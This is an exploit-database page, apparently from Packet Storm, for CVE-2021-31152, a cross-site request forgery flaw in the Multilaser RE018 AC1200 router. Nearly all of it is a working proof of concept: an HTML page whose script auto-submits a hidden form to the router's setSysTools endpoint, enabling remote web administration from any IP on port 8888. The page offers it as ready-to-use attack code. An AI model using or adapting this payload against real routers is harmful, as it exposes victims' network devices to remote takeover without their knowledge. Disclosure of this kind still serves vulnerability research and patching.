Multilaser Router RE018 AC1200 suffers from a cross site request forgery vulnerability.
dca6a56dfd210ff08c00169a9a746595fea7d2dddc29113d6e256a19ea759855#Exploit Title: Multilaser Router RE018 AC1200 - Cross-Site Request Forgery Enable Remote Access
#Date: 14/04/2021
#Exploit Author: Rodolfo Mariano
#Version: Firmware V02.03.01.45_pt
#CVE: 2021-31152
# Exploit code:
<html>
<body>
<form action="http://192.168.0.1/goform/setSysTools" method="POST">
<input name="module4" value="remoteWeb" type="hidden">
<input name="remoteWebType" value="any" type="hidden">
<input name="remoteWebIP" value="" type="hidden">
<input name="remoteWebPort" value="8888" type="hidden">
<input type="submit" value="Submit request">
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed